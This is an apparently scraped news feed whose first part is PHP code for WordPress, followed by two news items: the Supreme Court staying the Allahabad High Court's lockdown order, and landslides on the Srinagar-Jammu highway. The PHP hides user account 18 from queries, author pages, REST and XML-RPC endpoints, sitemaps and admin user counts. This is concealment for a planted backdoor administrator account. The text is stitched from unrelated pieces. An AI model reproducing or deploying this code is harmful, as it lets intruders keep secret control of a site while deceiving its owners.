add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Supreme Court puts Allahabad highcourt order on hold appeared first on The Edge Media.
]]> In its decision, the Supreme Court asked the state government to tell the Allahabad High Court in a week what steps it has taken to gain effective control over the corona infection. The Supreme Court will now hear this after two weeks.
Earlier, the Allahabad High Court’s decision to impose lockdown in 5 cities of Uttar Pradesh was challenged in the Supreme Court by Yogi Adityanath’s government.
Solicitor General Tushar Mehta presented on behalf of the state government. He had demanded a hearing on this matter on Tuesday, which was accepted by the Supreme Court.
During the hearing, Solicitor General Tushar Mehta, appearing for the Uttar Pradesh government, argued that the High Court’s decision would cause problems in the general administrative process.
At the same time, in the petition filed by the state government, it was said that the Allahabad High Court should not interfere in policy decisions.
The Supreme Court has also issued a notice to the petitioner seeking the lockdown, prohibiting the order of the High Court. Explain that the High Court had ordered lockdown in five cities of the state including Varanasi and Lucknow.
Meanwhile, regarding the order of Allahabad High Court, it has been said by the UP government that Corona cases have increased in the state and strictness is necessary for the control of Corona.
The government has taken many steps, further strict steps are being taken. Along with saving lives, the livelihood of the poor also has to be saved.
Therefore, the complete lockdown will not be done in the five big cities of UP. If people are imprisoning themselves in many places, then there is no harm in us.
The post Supreme Court puts Allahabad highcourt order on hold appeared first on The Edge Media.
]]>The post Landslides & Mudslides Blocked Srinagar-Jammu Highway appeared first on The Edge Media.
]]>Over 300 vehicles were stranded at several places on the highway, the only all-weather road connecting Kashmir valley with the rest of the country.
The men and machines of the National Highway Authority of India and Border Roads Organisation have started clearance of the landslides to restore the traffic on the highway, they said.
However, the Srinagar-Kargil-Leh road, which connects UTs of J-K and Ladakh, is open for traffic.
The Mughal road, connecting Shopian district of Kashmir valley with Poonch district of Jammu region, is through for vehicles carrying essentials, mostly trucks and oil tankers, they said.
The traffic on inter-district Kishtwar-Paddar road has been restored on Monday after clearance of landslides, which blocked the road 3 days ago, they said.
– PTI
The post Landslides & Mudslides Blocked Srinagar-Jammu Highway appeared first on The Edge Media.
]]>